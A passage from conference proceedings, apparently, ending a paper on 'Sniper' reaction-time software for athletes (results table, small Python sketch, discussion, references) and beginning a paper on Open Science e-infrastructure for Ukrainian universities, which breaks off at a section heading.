left hand. If there is a movement of a yellow point object, then there should be no reaction to it. Moving (point) objects move towards the target from different sectors of the screen, which are located on a circle from it, taking into account the delay and advance of the reaction. This mode is characterized by uniform and uniformly accelerated motion of point objects. In this case, for each time interval, the general medians of the pressing time and the general medians of the pressing-releasing time are determined. Operation in the “Efficiency” mode begins by pressing the “Start” button of the software (Fig. 7).
Fig. 7. The “Sniper” software interface in “Efficiency” mode
Thus, the study of the operating modes of the "Sniper" software product has shown that its main advantages, which distinguish it from other products, are the ability to control the velocity and initial size of a moving object, including providing its accelerated movement, and the ability to calculate the coefficient of balance of nervous processes, as well as to assess the parameters of excitation and inhibition in the central nervous system for various reactions to moving objects.
5 Results

More than 300 people of both sexes, aged 17 to 25 and professionally involved in sports, participated in the approbation of the "Sniper" software. Below we present the results of one of these tests, run in the "Accuracy" mode. The test parameters were the following: velocity of the moving object 250.0 mm/s; acceleration of the moving object 0.0 mm/s²; target diameter 15 mm; point object diameter 15 mm; number of tasks 32; delay between tasks: yes; name of the test results file: "1". After pressing the "Start"
button and completing the entire test, the software generated the file "1" with the following content (Table 1):

Table 1. Test results. Petro I. Sydorenko, Year of birth: 2005

Task No.  Projectile No.  Time to center, ms  Distance, mm  Pressing-releasing time, ms
1         1               19.05               4.76          214.42
2         7               -3.18               -0.79         202.45
3         1               32.81               8.2           216.5
4         5               10.48               2.62          210.94
5         2               14.97               3.74          200.08
6         1               5.29                1.32          202.63
7         6               -94.19              -23.55        296.68
8         7               4.23                1.06          192.48
9         4               132.29              33.07         187.56
10        6               -55.03              -13.76        201.1
11        7               10.58               2.65          168.31
12        5               44.9                11.23         187.61
13        1               28.58               7.14          180.22
14        6               -13.76              -3.44         181.56
15        2               5.99                1.5           192.52
16        6               -3.18               -0.79         219.49
17        0               -47.89              -11.97        234.29
18        6               43.39               10.85         170.26
19        3               -165.39             -41.35        238.97
20        7               44.45               11.11         191.92
21        3               104.77              26.19         169.16
22        6               41.28               10.32         150.26
23        0               20.95               5.24          191.25
24        3               35.92               8.98          166.94
25        1               -10.58              -2.65         183.54
26        7               17.99               4.5           179.36
27        7               -23.28              -5.82         168.48
28        6               1.06                0.26          174.46
29        6               -62.44              -15.61        155.95
30        1               -27.52              -6.88         148.18
31        7               -7.41               -1.85         169.03
32        1               -16.93              -4.23         145.27

Velocity: 250.0 mm/s
Acceleration: 0.0 mm/s²
Projectile diameter: 15 mm
Target diameter: 15 mm
Mode: Accuracy
Task generation: Number of tasks 32
Delay: yes
Total completed tasks: 32
Completed tasks (LZ): 26
Completed tasks (RZ): 21
Completed tasks (TZ): 21
Completed tasks (BZ): 19
Total average distance: 8.98 mm
Total median of distances: 1.41 mm
Total time median to center: 5.64 ms
Average distance (LZ): 6.31 mm
Median of distances (LZ): 0.66 mm
Time median to center (LZ): 2.65 ms
Average distance (RZ): 10.94 mm
Median of distances (RZ): 1.06 mm
Time median to center (RZ): 4.23 ms
K(LZ): 0.58
K(RZ): 1.73
Average distance (TZ): 11.46 mm
Median of distances (TZ): 0.26 mm
Time median to center (TZ): 1.06 ms
Average distance (BZ): 6.06 mm
Median of distances (BZ): 2.62 mm
Time median to center (BZ): 10.48 ms
K(TZ): 1.89
K(BZ): 0.53
Total average pressing-releasing time: 190.37 ms
Total average time to center: 35.93 ms
Average pressing-releasing time (LZ): 189.64 ms
Average time to center (LZ): 25.23 ms
Average pressing-releasing time (RZ): 189.67 ms
Average time to center (RZ): 43.77 ms
Average pressing-releasing time (TZ): 191.84 ms
Average time to center (TZ): 45.82 ms
Average pressing-releasing time (BZ): 186.39 ms
Average time to center (BZ): 24.24 ms
(LZ, RZ, TZ and BZ denote the left, right, top and bottom zones of the screen, respectively.)
Negative values in the test results indicate that the center of the point object had not yet reached the center of the target at the moment of pressing (advance reaction), while positive values indicate that it had overshot it (delayed reaction). Based on observations of the examinees' actions and analysis of the software output, we can conclude that the software operates correctly.
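As an illustration of how such a protocol can be post-processed, the sketch below converts a signed miss distance into a signed time error at uniform velocity and computes the coefficient of balance of nervous processes as the ratio of the median of delayed reactions to the median of advance reactions (the ratio-of-medians definition is stated in the Conclusions; the sign convention, positive for overshoot, follows the paragraph above, and the function names are ours).

    from statistics import median

    def time_to_center_ms(distance_mm: float, velocity_mm_s: float = 250.0) -> float:
        """Signed time error corresponding to a signed miss distance."""
        return distance_mm / velocity_mm_s * 1000.0

    def balance_coefficient(signed_distances_mm) -> float:
        """Ratio of the median delayed reaction (positive overshoot)
        to the median advance reaction (negative undershoot)."""
        delays = [d for d in signed_distances_mm if d > 0]
        advances = [-d for d in signed_distances_mm if d < 0]
        if not delays or not advances:
            raise ValueError("both delayed and advance reactions are required")
        return median(delays) / median(advances)

    # For example, time_to_center_ms(4.76) == 19.04 ms, consistent with the
    # first row of Table 1 (velocity 250.0 mm/s, zero acceleration).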
6 Discussion

The use of the "Sniper" software in studies of young basketball players aged 12–13 has revealed the peculiarities of the reaction to a moving object in male and female groups of athletes under binocular and monocular perception. These studies also show that sensorimotor reactivity can be influenced by the laterality of visual sensory input [15]. In studies of young female volleyball players, an increase in the accuracy of the sensorimotor response in the age period of 10–13 years was established against the background of the formation of a balance between excitation and inhibition processes; the obtained data also make it possible to identify correlations between sensorimotor and motor accuracy. Studies of young athletes aged 17–20 have shown the appearance of gender differences in the accuracy of the sensorimotor response as the velocity of the object increases, which indicates an imbalance between the processes of excitation and inhibition under a variable input signal [16]. When testing qualified field hockey players, dynamic characteristics of the accuracy of the sensorimotor reaction were established during the transition from one type of visual perception to another, which indicates asynchrony of the processes of excitation and inhibition under a changing input visual signal. Studies of qualified athletes show that in acyclic sports the central nervous system is able to pass into a state of excitation when the velocity of the input visual signal changes, which is not observed in cyclic sports. Testing of the sensorimotor reactivity of young basketball players has revealed the influence of the predominance of excitation or inhibition processes on the formation of the spatial accuracy of movements.

Thus, as a result of experimental testing of the developed software product, the following advantages over alternative programs for studying the reaction to moving objects are established:

• the possibility to control the velocity of a moving object from 200 to 300 mm/s;
• the ability to provide accelerated movement of a point object towards a test target;
• the possibility to change the initial size of the test and moving objects;
• the ability to calculate the coefficient of balance of nervous processes from the parameters of the reaction to a moving object, as a median of distances to the center of the test object;
• the possibility of assessing the parameters of excitation and inhibition in the central nervous system separately for reactions to moving objects from the right, left, bottom and top fields of vision.
7 Conclusions

The developed software service makes it possible to determine new qualitative characteristics of the reaction to a moving object and of the ratio of excitation and inhibition processes in the central nervous system, and to increase the objectivity and efficiency of assessing these characteristics of the human body. This is achieved by registering and evaluating the reaction at the closest possible coincidence of the test object with point objects that are located around it in a circle and move towards it from different sectors.
The output values of velocity and acceleration can be changed, as can the sizes of the test and moving objects. The scientific novelty of the work lies in the improvement of the software service on the basis of the developed method for determining excitation and inhibition in the central nervous system. This methodological approach makes it possible to characterize a person's peripheral vision and the features of visual perception of moving objects. The differences between the proposed software service and the existing ones are: the ability to change the acceleration of the moving object and the sizes of the moving and point objects; assessment of reactions to moving objects separately from the right, left, bottom and top fields of vision; determination of the time of pressing and releasing a button during reactions; use of the median to characterize reactions to a moving object; and calculation of the coefficient of equilibrium of nervous processes as the ratio of the median of delayed reactions to the median of advance reactions. The developed technology can be used in medical, psychological, physiological, sports, aerospace and pedagogical practice to diagnose the functional state and determine the behavioral capabilities of people of all ages and professions.
References

1. Bhatia, A., Moza, S., Bhalla, U.S.: Precise excitation inhibition balance controls gain and timing in the hippocampus. Dryad (2019). https://doi.org/10.5061/dryad.f456k4f
2. He, H.Y., Cline, H.T.: What is excitation/inhibition and how is it regulated? A case of the elephant and the wisemen. J. Exp. Neurosci. 13, 1179069519859371 (2019). https://doi.org/10.1177/1179069519859371
3. Lee, J.C., Livesey, E.J.: Second-order conditioning and conditioned inhibition: influences of speed versus accuracy on human causal learning. PLoS ONE 7(11), e49899 (2012). https://doi.org/10.1371/journal.pone.0049899
4. Malagarriga, D., Villa, A.E.P., Garcia-Ojalvo, J., Pons, A.J.: Mesoscopic segregation of excitation and inhibition in a brain network model. PLoS Comput. Biol. 11(2), e1004007 (2015). https://doi.org/10.1371/journal.pcbi.1004007
5. Frohlich, J.: Excitation and inhibition: the yin and yang of the brain. Beautiful complexity arises from the balance of two opposing forces. https://www.psychologytoday.com/us/blog/consciousness-self-organization-and-neuroscience/201701/excitation-and-inhibition-the-yin-and
6. Collet, C., Di Rienzo, F., El Hoyek, N., Guillot, A.: Autonomic nervous system correlates in movement observation and motor imagery. Front. Hum. Neurosci. 7, 415 (2013). https://doi.org/10.3389/fnhum.2013.00415
7. Dehghani, N., Peyrache, A., Telenczuk, B., et al.: Dynamic balance of excitation and inhibition in human and monkey neocortex. Sci. Rep. 6, 23176 (2016). https://doi.org/10.1038/srep23176
8. Makarenko, M.V., Lyzohub, V.S., Kharchenko, D.M., et al.: Method for determining the level of strength of human nervous processes. UA Patent 3857 (2004). Bul. 12
9. Makarenko, M.V., Lyzohub, V.S., Kharchenko, D.M., et al.: Method for determining the level of functional mobility of human nervous processes. UA Patent 61246 (2005). Bul. 8
10. Makarenko, M.V., Lyzohub, V.S., Kharchenko, D.M., et al.: Method for determining the level of human sensorimotor reactivity. UA Patent 78145 (2007). Bul. 2
11. Pesoshin, A.V., Petukhov, I.V., Rozhentsov, V.V.: Time evaluating technique applied for human reaction to moving object. Patent 2326595 (2008). Bul. 17
12. Pesoshin, A.V., Lezhnina, T.A., Rozhentsov, V.V.: Method of estimating time of person's emergency response to moving object. Patent 2408265 (2011). Bul. 10
13. Lyubchenko, K.M., Petrenko, Yu.O., Kovalenko, S.O., et al.: Computer program "SNIPER". Certificate of authorship 105572 (2021). Bul. 65
14. Petrenko, Yu.O., Kovalenko, S.O., Frolova, L.S., et al.: Method for determining excitation and inhibition in the central nervous system. UA Patent 118142 (2017). Bul. 14
15. Frolova, L.S., Kovalenko, S.O., Petrenko, Yu.O., et al.: Gender differences of basketball players aged 12–13 years according to the response to a moving object. Pedag. Psychol. Med.-Biol. Probl. Phys. Train. Sports 22(5), 252–259 (2018). https://doi.org/10.15561/18189172.2018.0505
16. Frolova, L.S., Chernenko, N.P., Petrenko, Yu.O.: Features of visual-motor reaction of young volleyball players and its influence on the accuracy of the attacking blow. Bull. Cherkasy Bohdan Khmelnytsky Natl. Univ. Biol. Sci. 2, 71–79 (2021). https://doi.org/10.31651/2076-5835-2018-1-2021-2-71-79
Modelling the Universities' E-Infrastructure for the Development of Open Science in Ukraine

Iryna Drach1, Olha Petroye1, Nataliia Bazeliuk1(B), Oleksandra Borodiyenko1, and Olena Slobodianiuk2

1 Institute of Higher Education of the National Academy of Educational Sciences of Ukraine, Kyiv, Ukraine
{i.drach,o.petroye,n.bazeliuk,o.borodienko}@ihed.org.ua
2 Vinnytsia National Technical University, Vinnytsia, Ukraine
[email protected]
Abstract. Developing universities' e-infrastructure is crucial for progressing Open Science (OS) in Ukraine and its successful integration into the ERA and EHEA. The study's object is the OS ecosystem, and its subject is the universities' research e-infrastructures for OS. The study's goal is to theoretically substantiate the model of the Ukrainian universities' research e-infrastructures ecosystem for the development of OS in Ukraine. The study used methods of analysis, synthesis, and generalisation of the EU documents on the ERA and EHEA and of research publications on implementing OS. The state, issues and tasks of developing e-infrastructures in Ukraine are studied using quantitative and qualitative analysis methods. The modelling method has been used to develop a model of the Ukrainian universities' research e-infrastructures ecosystem. As a result of the study, based on a generalisation of the UNESCO, EU, and European University Association standards, the main components of the OS ecosystem are determined. The model of the research e-infrastructures ecosystem of Ukrainian universities is proposed and theoretically substantiated. It has been developed taking into account the existing national research e-infrastructure, the OS ecosystem and the EU research e-infrastructures, and it reflects the main policy directions for its establishment and development. Proposals for developing the OS research e-infrastructures of Ukrainian universities are provided.

Keywords: Open science ecosystem · research infrastructure · e-infrastructure modelling
1 Introduction

Among the key trends in the development of university science at the present stage of digital transformation are the multiple increase in data, the functioning of complex ecosystems of research e-infrastructures and the development of Open Science, characterized by transparent, accessible and reusable scientific knowledge and by open processes of its creation and evaluation involving a wide range of stakeholders [1, 2]. The relevance of this study is due, on the one hand, to the problems of infrastructural support of research activities in Ukraine, the high level of scientific equipment wear, and the low
level of digitalisation, which negatively affect university science and the quality and efficiency of research and development (R&D) and hinder the innovative development of Ukraine [3, p. 61]. In addition, according to surveys, in 2020 only 29% of higher education institutions in Ukraine were ready to integrate with the National Repository of Academic Texts (NRAT) [4], which indicates the overall low level of use of the existing research e-infrastructure capacity by universities. An obstacle to the development of open university science, in the context of external communications, cooperation with the public and various stakeholders, and the integration of Ukrainian open science into the EU open science ecosystem, is also the low overall level of e-infrastructure development in Ukraine [5, p. 138]. The destruction of many universities' physical infrastructure by the military actions of the Russian Federation in Ukraine adds urgency to the task of building universities' research e-infrastructures, and demand for their use is growing under the conditions of forced remote work. According to experts of the National Council for the Recovery of Ukraine from the War [6], the development of e-infrastructure should be one of the priority areas for developing the potential of Open Science in the action plan for the post-war reconstruction and development of Ukraine.

The theoretical basis of this study is the works of foreign authors, which helped to clarify general methodological issues of Open Science, research infrastructures, research e-infrastructures, etc. S. Friesike, B. Widenmayer, O. Gassmann, and T. Schildhauer noted that Open Science describes an irreversible paradigm shift in research [7]. R. Vicente-Saez and C. Martinez-Fuentes presented the results of a systematic review of scientific papers and focused on the need to define the concept of "Open Science" [8]. B. Fecher, R. Kahn, N. Sokolovska, T. Völker, and P. Nebe understood research infrastructures as deeply relational and adaptive systems where the material and social aspects are in permanent interplay; they are embedded in the social practice of research and influenced by environmental factors [9]. E. McKiernan, P. Bourne, C. Brown, S. Buck, A. Kennal, J. Lin, D. McDougall, B. Nosek, and K. Ram emphasised the insufficient practice of using open access, open data, and open sources [10]. H. Laine highlighted the conceptual harmonisation of the ethical principles of research integrity, open science and responsible behaviour of researchers [11]. V. Valzano pointed out the necessity to review the rules for evaluating research under the Open Science movement [12], and A. Maddi proposed a relevant indicator [13]. The issues of defining strategic directions and codifying numerous standards of responsibility as a critical condition for transforming research activities towards "responsible openness" and "innovation" are considered in the publications of E. Forsberg, A. Gerber, S. Carson [14], J. Tijdink, S. Horbach, M. Nuijten, G. O'Neill [15], etc. The source basis for the study of modern standards of research e-infrastructures comprised UNESCO regulations [16] and the information sources, policy documents, and analytical and methodological developments in the field of research infrastructures and Open Science of the EU and the European University Association [17–24], etc.
Their analysis and generalisation contributed to shaping the ideas on the preconditions, strategic goals, objectives, achievements and problems of developing the open science research e-infrastructures ecosystem at the institutional (including university), national and European levels. At the same time, they revealed the lack of a single approach among researchers and practitioners
on defining the concepts of "open science", "research infrastructure", and "research e-infrastructure", their content, structure, and main components, which can be explained by the complexity and relative novelty of the studied phenomena. We therefore had to substantiate the complex of the main components of an "open science ecosystem" and clarify the content and structure of the universities' research infrastructures ecosystem as a crucial condition for strengthening their research capacity under digital transformation and the growing demands from society for openness, inclusiveness, responsibility, and an innovative character of science.

The Ukrainian context of our study is based on the publications of O. Chmyr, who analysed the development of research e-infrastructure in Ukraine, in particular the creation of the National Repository of Academic Texts [25], and O. Orliuk, who considered Ukraine's legal steps towards integration into the European Open Science Cloud with respect to the public authorities' activities and the fulfilment of obligations under the Association Agreement between Ukraine and the European Union [26]. The study's theoretical basis also involves the analytical materials of "Theoretical Bases of Increasing the Ukrainian Universities' Research Capacity in the Context of Implementing the Open Science", developed in particular by the authors of this paper I. Drach, O. Petroye and N. Bazeliuk [2]. The generalised Ukrainian regulative acts and analytical materials, which reflect the political, organisational and functional principles of developing the open science research infrastructure of national universities, also comprise the source base of the study.

Despite the undeniable value of the recent publications of foreign and domestic researchers, the analysis of their results showed the lack of systematic developments on ecosystems of e-infrastructure support for the research activities of universities in Open Science. A review of the basic regulations of Ukraine and a study of the methodological and analytical documents that reflect the organisational and functional principles of developing universities' research activities confirmed that theoretical and practical issues remain in the development of open science, research infrastructure and universities' research e-infrastructures in Ukraine, which determined the choice of the research topic. The study's goal is to theoretically substantiate the model of the Ukrainian universities' research e-infrastructures ecosystem for the development of open science in Ukraine. The goal is achieved by performing three specific tasks: (1) analyse conceptual approaches, provide a generalised vision of Open Science, and determine the main components of its ecosystem; (2) theoretically substantiate the model of the research e-infrastructures ecosystem of Ukrainian universities; (3) identify priorities and provide recommendations for the development of open science research e-infrastructures in Ukrainian universities.

The paper structure logically follows the tasks aimed at achieving the goal, which allows developing a general scheme and identifying the main thematic blocks of the study within the framework set by the paper regulations. The thematic block "Materials and methods" describes the primary theoretical material on open science as the critical object in which e-infrastructures are being deployed to ensure the functioning of universities' research activities.
The next stage of our study covers the analysis of the source data and general schemes of the functioning of research infrastructures for open science and of the development of research e-infrastructures. The obtained results allowed us to clarify the issues and some
aspects of research e-infrastructures development policy in Ukrainian universities. In turn, the generalisation of the theoretical materials and analytical data obtained during the analysis allowed us to propose a model of the Ukrainian universities' open science research e-infrastructure and to justify the composition and role of its main components. An important place in the structure of the study is given to the recommendations addressed to the actors at the institutional (university) and national levels who are responsible for providing the research e-infrastructure of universities for the development of Open Science in Ukraine.
2 Materials and Methods

The presentation of the main materials of the study begins with the coverage of the conceptual provisions that reveal the content of the open science ecosystem.

2.1 Open Science Ecosystem

The need to provide conditions for universities' research activities under martial law and for the economic recovery of Ukraine in the post-war period actualises the increase in research quality through digital transformation, which is the aim of the Open Science policy actively implemented in the ERA and EHEA. According to the Rome Ministerial Communiqué, higher education institutions need to be supported in the use of digital technologies for teaching, learning and assessment, as well as for academic communication and research, investing in the development of digital skills and competences for all [27]. Open Science is "an inclusive construct that combines various movements and practices aiming to make multilingual scientific knowledge openly available, accessible and reusable for everyone, to increase scientific collaborations and sharing of information for the benefits of science and society, and to open the processes of scientific knowledge creation, evaluation and communication to societal actors beyond the traditional scientific community. It comprises all scientific disciplines and aspects of scholarly practices, including basic and applied sciences, natural and social sciences and the humanities, and it builds on the following key pillars: open scientific knowledge, open science infrastructures, science communication, open engagement of societal actors and open dialogue with other knowledge systems" [28, p. 7].

Open Science is a change in the system that makes it possible to improve science through open and collaborative ways of producing and sharing knowledge and data as early as possible in the research process, as well as for communicating and sharing results. This new approach influences research institutions and research practices, creating new ways of funding, evaluating and rewarding researchers. Open Science enhances the quality and impact of science by promoting reproducibility and interdisciplinarity; it makes science more efficient through a better exchange of resources, more reliable, and more responsive to the needs of society. Eight ambitions of the Open Science policy are determined:

• Open data: FAIR principles and open data exchange should be a condition for funding research in the EU countries;
• European Open Science Cloud (EOSC): development of the EOSC as "a unified ecosystem of research data infrastructures", which will allow the scientific community to share and process research results regardless of borders and research fields;
• New generation metrics: new indicators need to be developed to complement the generally accepted ones for evaluating research quality and impact, in order to give due credit to open scientific practices;
• Future of research communication: all peer-reviewed scientific publications should be freely available, and the early exchange of different types of scientific results should be encouraged;
• Rewards: scientific career evaluation systems should fully recognise the openness of scientific activity;
• Research integrity: all EU-funded research should meet commonly agreed standards of research integrity;
• Education and skills: all researchers in Europe should have the necessary skills and support to apply open science procedures and practices;
• Citizen science: the general public should be able to contribute significantly to the production of scientific knowledge in Europe [24].

Open Science is built on the following key pillars: open scientific knowledge, open science infrastructures, open engagement of societal actors and open dialogue with other knowledge systems [16, p. 11]. Open scientific knowledge refers to open access to scientific publications, research data, metadata, open educational resources, software, and source code and hardware that are available in the public domain or under copyright. It also refers to the possibility of opening research methodologies and evaluation processes [16, p. 9].

Open science infrastructures refer to shared research infrastructures (virtual or physical), including major scientific equipment or sets of instruments; knowledge-based resources such as collections, journals and open access publication platforms; repositories, archives and scientific data; current research information systems; open bibliometric and scientometric systems for assessing and analysing scientific domains; open computational and data manipulation service infrastructures that enable collaborative and multidisciplinary data analysis; and digital infrastructures. Open science infrastructures are often the result of community-building efforts, which are crucial for their long-term sustainability; they should therefore be not-for-profit and guarantee permanent and unrestricted access for the whole public to the largest extent possible [16, p. 12].

Open engagement of societal actors refers to extended collaboration between scientists and societal actors beyond the scientific community, achieved by opening up practices and tools that are part of the research cycle and by making the scientific process more inclusive and accessible to the broader inquiring society, based on new forms of collaboration and work such as crowdfunding, crowdsourcing and scientific volunteering. Furthermore, citizen science and citizens' participation have developed as models of scientific research conducted by non-professional scientists, following scientifically valid methodologies and frequently carried out in association with formal scientific programmes or with professional scientists, using web-based platforms and social media, as well as open-source hardware and software [16, p. 13].
Open dialogue with other knowledge systems refers to the dialogue between different knowledge holders that recognises the richness of diverse knowledge systems and epistemologies and the diversity of knowledge producers, in line with the 2001 UNESCO Universal Declaration on Cultural Diversity. It aims to promote the inclusion of knowledge from traditionally marginalised scholars and to enhance the interrelationships and complementarities between diverse epistemologies, adherence to international human rights norms and standards, respect for knowledge sovereignty and governance, and the recognition of the rights of knowledge holders to receive a fair and equitable share of the benefits that may arise from the utilisation of their knowledge. In particular, links with indigenous knowledge systems need to be built [16, p. 15].

When implementing changes in universities related to the implementation of Open Science, its characteristics and indicators should be taken into account (Fig. 1):

• open research data: research data repositories; funder policies on data sharing; researcher attitudes towards data sharing;
• open scholarly communication: open peer reviews; journal policies on open peer reviews; use of altmetric platforms; corrections and retractions;
• open access to publication: open access to publication; preprints; alternative publishing platforms; funder policies on open access; journal policies on open access; researcher attitudes towards open access [31].

Open Science is therefore not a series of static issues, but a complex mix of themes and topics yet to be identified. Universities will need to ensure that they are fully informed on the potential impacts of Open Science as the concept develops [22, p. 7].
Fig. 1. Open Science “Wheel” describing key Open Science characteristics and indicators (from Open Science Monitor) [2, p. 47], [24], [31, p. 134]
Today Open Science, which makes research accessible to all, acquires the characteristics of a standard way of producing knowledge, and under Open Science the role of universities grows. The role of universities as subjects of Open Science is that their communities of students, researchers and professionals, including graduates and a wide range of partners and citizens, united in institutions with networks at the local, national and international levels, build bridges between countries, cultures and sectors, demonstrating peaceful and constructive European and international cooperation for high-quality research and innovation, as well as teaching and learning [16, p. 5].

A necessary task for modelling the universities' open science ecosystem is to clarify the features of the functioning of research infrastructures, which underlie the knowledge triangle: research, education and innovation [29, p. 4]. By offering unique research services to users from different countries, involving representatives of different interest groups in science and forming a network of research objects, research infrastructures contribute to structuring scientific communities, play a key role in building an effective research and innovation environment, and promote institutional, national, regional, European and global economic development. According to the UNESCO Recommendation on Open Science (2021), open research infrastructures are components of common, virtual and physical, research infrastructures needed to support Open Science and serve the needs of different research communities. The ecosystem of open scientific infrastructure is formed by open laboratories, open scientific platforms and repositories for publications, research data and source codes, software development and virtual research environments, etc. Examples of open science infrastructures are open innovation test benches, including incubators, accessible research facilities, open licenses, as well as science shops, science museums, science parks and research complexes that provide shared access to physical facilities, open science opportunities and services [16, p. 12].

The EU has a well-established tradition of building effective research infrastructure ecosystems to meet science needs, provide resources and services to members of the research community, conduct research and promote innovation. The value of studying the EU experience in this field for Ukrainian universities has been growing since June 9, 2022, when the agreement associating Ukraine with Horizon Europe, the EU research and innovation programme (2021–2027), and the Euratom Research and Training Programme (2021–2025) entered into force following its ratification by Ukraine [28]. Ukrainian research and innovation actors can now fully participate in these programmes on equal terms with entities from the EU member states. The main components of the European research infrastructure are: scientific equipment or toolkits; collections, archives and scientific data; computer systems and communication networks; and any other research and innovation infrastructure of a unique nature that is open to external users [20]. By the definition of the High-Level Expert Group to Assess the Progress of ESFRI and Other World Class Research Infrastructures [30, p. 10], the concept of research infrastructure, in addition to basic equipment, toolkits and knowledge-containing resources such as collections, archives and data banks, also covers relevant human resources.
It also addresses unique tools, resources and services that ensure a high level of research in all fields of science. European research infrastructures, aimed at ensuring cooperation, inclusiveness, openness, and access to world-class infrastructures
in various fields of knowledge, have significantly contributed to the transformation of science in Europe and the world. They play an essential role in enabling the broadest community of researchers to carry out breakthrough research, make scientific discoveries, develop technologies and inventions, and promote competences, innovation and competitiveness. The development of research infrastructures, equipment and services is also based on the recognition that they are crucial for maintaining and strengthening the EU's leading position in research and innovation. Universities play a significant role in the process of building research infrastructures. They provide key scientific and technical results of research infrastructures, deploy and operate them, strengthening research and innovation capacity in Europe, and train and prepare researchers, technicians and managers of research infrastructure [31, pp. 147–148]. However, according to experts, the role of universities, as well as of their research infrastructures, is still insufficiently recognised, and they are not always involved in either the national or the EU context. Universities face cultural, technical, financial and other barriers to sharing access to research infrastructure with each other and with non-academic sectors [31, p. 31]. The European University Association's vision for the decade, "Universities without walls" by 2030, recognises that the key to universities' success lies in rooting their values of openness and in deepening engagement with other sections of society [32, p. 3]. Moreover, additional investment in physical and digital research infrastructures is crucial for strengthening the role and capacity of European universities in science, education and innovation. With proper organisation, universities, students and society can all benefit from building research infrastructures [32, p. 11]. Therefore, the financial policies of the EU and its member states until 2030 are aimed at helping universities to develop research infrastructures in order to strengthen their capacity to create and disseminate relevant, in-demand knowledge to address societal challenges. The legal framework for university cooperation at the EU level is provided by the European Research Infrastructure Consortium (ERIC) [19] and the European Grouping of Territorial Cooperation (EGTC) [31, pp. 39–40]. ERIC promotes the creation and operation of new or existing research infrastructures of European interest:

• preserving fundamental democratic values and the rule of law in the EU;
• maintaining broadly similar economic trajectories between the EU member states and regions;
• ensuring the EU's role as a global leader in the fight against climate change;
• support for a reliably and evenly controlled EU external border;
• support for constructive and principled relations with the EU's neighbours, and support for a cooperative international system and good relations with third countries [33, p. 1].

2.2 General Context of Establishing and Developing Research E-Infrastructures

One of the most critical components of the open science ecosystem today is research e-infrastructures, which differ from other research infrastructures in their ability to provide digital services, resources and tools for research and to promote innovation.
Experts from the Global Research Data Infrastructures (GRDI) consider two concepts for defining e-infrastructure. According to the network concept, an e-infrastructure (research data infrastructure) is a set of managed network environments for digital scientific data, consisting of services and tools that support: (1) the whole research cycle; (2) the movement of scientific data across scientific disciplines; (3) the creation of open linked data spaces by connecting data sets from diverse disciplines; (4) the management of scientific workflows; (5) the interoperation between scientific data and literature; and (6) an integrated science policy framework. According to the authors of this concept, the condition for the effective functioning of a networked research e-infrastructure is the design and engineering of its three key objects, organisational practice, technical infrastructure and social structure, which together ensure uninterrupted joint research activities across different geographical areas. According to the relational concept, an e-infrastructure (data infrastructure) is an intermediary between research communities and data/publication collections, mediated services and tools [21]. Research e-infrastructures combine digital technologies, computing resources and open opportunities for scientific cooperation and for the creation of new virtual research communities based on the exchange, integration, access and sharing of research tools and resources, etc., and they change over time to meet the needs of a dynamically changing research process [34]. They can be located on one website or hosted on a large number of different websites that work together, and they can be of various sizes, ranging from large-scale facilities of European importance and national facilities to individual institutional and functional infrastructure facilities [30, pp. 10–11].
It covers a wide range of sectors and facilitates the interaction of datasets and tools from different vendors, as well as allows researchers to do their work faster and disseminate the results of their research more widely [17]. Under the current development period (2021–2027), the EOSC Association will work in partnership with the EC, member states
and associated countries under the Horizon Europe Research and Innovation Programme, serving 2 million European researchers [35, pp. 162–163]. The development of research e-infrastructures is an integral component and an essential task of the new strategy "Shaping Europe's Digital Future", launched in 2020 [36, p. 17]. The Digital Europe Programme (DIGITAL), a new EU funding programme aimed at providing digital technologies to businesses, citizens and public administrations, with a total budget of €7.5 billion for 2021–2027, has been launched to implement the EU's digital transformation plans. The Digital Europe programme complements funding available through other EU programmes, such as Horizon Europe for research and innovation and Connecting Europe for digital infrastructure, aimed at the digital transformation of European society and the economy [37]. Thus, through developing strategic plans and programmes and implementing special funding instruments, the EU plays a crucial role in modernising the national research e-infrastructures of the EU member states and harmonising them with the e-infrastructure ecosystem of the European Research Area. By supporting the open science policy, the EU supports European science, industry and public authorities in developing world-class e-infrastructures for data storage and management, high-speed transport connectivity and powerful high-performance data-processing computers [17]. At the same time, the European university community proceeds from the understanding that European funding programmes are significant for European cooperation; however, they should work in addition to sufficient public funding [32, p. 11].
3 Results

The next stage of the study was the analysis of the components of research e-infrastructures in the crucial areas of Open Science; its main result was the theoretical substantiation of the model of the research e-infrastructures ecosystem of Ukrainian universities, based on the generalisation of theoretical constructs and an analysis of the actual state of affairs in the researched sphere in Ukraine.

3.1 Problems and Tasks for the Development of Research E-Infrastructures in Ukraine

According to the results of the audit conducted by the State Audit Office of Ukraine in 2019–2020, one of the main barriers to the development of research e-infrastructure in Ukraine is the digital divide, which makes it impossible for researchers and all citizens to realise their rights and responsibilities due to restrictions on access to technology, competencies, and means of digital production and interaction. Overcoming the problem of digital gaps is impossible at the extremely low level of investment in R&D in Ukraine, which reaches only 0.5% of GDP and is three times lower than in Poland [3, p. 40]. The level of digital competences of the participants in the educational and scientific process is also insufficient, and there is a lack of the digital infrastructure that would allow establishing effective interaction between education, research institutions and business [38]. The task of developing Open Science research e-infrastructures follows from several strategic plans of Ukraine outlined in the pre-war period, which do not lose their relevance under martial law and will be essential for accelerating the post-war recovery of our
country. Thus, the development of the digital economy as one of the drivers of economic growth was identified in the "National Economic Strategy for 2030" [39]. Forming the foundations for Open Science and digital innovation and developing the research infrastructure that ensures the integration of researchers into the ERA, as well as integrating Ukrainian e-infrastructures into European e-infrastructures and consolidating them, are among its central goals, ensuring the access of Ukrainian researchers to European research infrastructures. The development of innovation infrastructures taking into account the best European practices, among other goals, was outlined in the "Roadmap for the Integration of Ukraine's Science and Innovation System into the ERA" [40]. The design and development of a modern ecosystem of Ukrainian research e-infrastructure, taking into account modern ERA practices, is one of the key goals and objectives of the Concept of the "State Target Programme for the Development of Research Infrastructures in Ukraine until 2026" [41]. According to the "Concept of the Recovery Plan" outlined by the Cabinet of Ministers of Ukraine in May 2022, one of the main principles of the Recovery Plan of Ukraine is its development as an advanced digital state and compliance with the EU candidate country criteria [42, p. 5]; this emphasises the importance and urgency of developing an effective model of the research e-infrastructures ecosystem of Ukrainian universities.

3.2 Substantiation of the Model for the Open Science E-Infrastructure of Ukrainian Universities

